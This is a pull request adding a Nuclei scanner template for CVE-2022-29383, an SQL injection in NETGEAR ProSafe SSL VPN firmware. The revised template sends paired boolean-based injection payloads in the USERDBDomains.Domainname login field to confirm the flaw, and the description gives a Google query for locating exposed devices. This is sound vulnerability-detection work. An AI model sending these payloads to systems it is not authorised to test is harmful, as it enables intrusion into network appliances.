### PR TITLE
Added CVE-2022-29383 template

### DIFF
--- a/cves/2022/CVE-2022-29383.yaml
+++ b/cves/2022/CVE-2022-29383.yaml
@@ -7,8 +7,9 @@ info:
   description: |
     NETGEAR ProSafe SSL VPN multiple firmwares were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi.
   reference:
-    - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383
+    - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383
     - https://nvd.nist.gov/vuln/detail/CVE-2022-29383
+    - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8

--- a/cves/2022/CVE-2022-29383.yaml
+++ b/cves/2022/CVE-2022-29383.yaml
@@ -1,43 +1,40 @@
 id: CVE-2022-29383
 
 info:
-  name: NETGEAR ProSafe SSL VPN firmware SRX5308, FVS318Gv2, FVS318N, FVS336Gv2 and FVS336Gv3 SQL Injection
+  name: NETGEAR ProSafe SSL VPN firmware - SQL Injection
   author: elitebaz
   severity: critical
-  description: NETGEAR ProSafe SSL VPN multiple firmwares were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi.
+  description: |
+    NETGEAR ProSafe SSL VPN multiple firmwares were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi.
   reference:
-    - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-29383
     - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383
-  tags: cve,cve2022,sqli,netgear
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29383
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2022-29383
+  tags: cve,cve2022,sqli,netgear,router
 
 requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/scgi-bin/platform.cgi'
+  - raw:
+      - |
+        POST /scgi-bin/platform.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=utf-8
 
-    stop-at-first-match: true
-    matchers-condition: and
+        thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd
+
+      - |
+        POST /scgi-bin/platform.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=utf-8
+
+        thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd
+
+    req-condition: true
     matchers:
-      - type: word
-        part: body
-        words:
-          - "Gigabit Quad WAN SSL VPN Firewall SRX5308"
-          - "Gigabit Dual WAN SSL VPN Firewall FVS336Gv3"
-          - "Gigabit Dual WAN SSL VPN Firewall FVS336Gv2"
-          - "Gigabit 8 Port VPN Firewall FVS318Gv2"
-          - "Gigabit 8 Port VPN Firewall FVS318N"
-        condition: or
-
-      - type: word
-        part: header
-        words:
-          - "Embedded HTTP Server"
-
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - contains(body_1, "User authentication Failed")
+          - contains(body_2, "User Login Failed for SSLVPN User.")
+        condition: and

--- a/cves/2022/CVE-2022-29383.yaml
+++ b/cves/2022/CVE-2022-29383.yaml
@@ -1,0 +1,43 @@
+id: CVE-2022-29383
+
+info:
+  name: NETGEAR ProSafe SSL VPN firmware SRX5308, FVS318Gv2, FVS318N, FVS336Gv2 and FVS336Gv3 SQL Injection
+  author: elitebaz
+  severity: critical
+  description: NETGEAR ProSafe SSL VPN multiple firmwares were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi.
+  reference:
+    - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29383
+    - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383
+  tags: cve,cve2022,sqli,netgear
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-29383
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/scgi-bin/platform.cgi'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Gigabit Quad WAN SSL VPN Firewall SRX5308"
+          - "Gigabit Dual WAN SSL VPN Firewall FVS336Gv3"
+          - "Gigabit Dual WAN SSL VPN Firewall FVS336Gv2"
+          - "Gigabit 8 Port VPN Firewall FVS318Gv2"
+          - "Gigabit 8 Port VPN Firewall FVS318N"
+        condition: or
+
+      - type: word
+        part: header
+        words:
+          - "Embedded HTTP Server"
+
+      - type: status
+        status:
+          - 200

--- a/cves/2022/CVE-2022-29383.yaml
+++ b/cves/2022/CVE-2022-29383.yaml
@@ -14,6 +14,8 @@ info:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2022-29383
+  metadata:
+    verified: true
   tags: cve,cve2022,sqli,netgear,router
 
 requests:


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2022-29383
NETGEAR ProSafe SSL VPN multiple firmwares were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi

- References:
    - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383
    - https://nvd.nist.gov/vuln/detail/CVE-2022-29383
    - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
Google Query = inurl:scgi-bin intitle:"NETGEAR ProSafe"
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)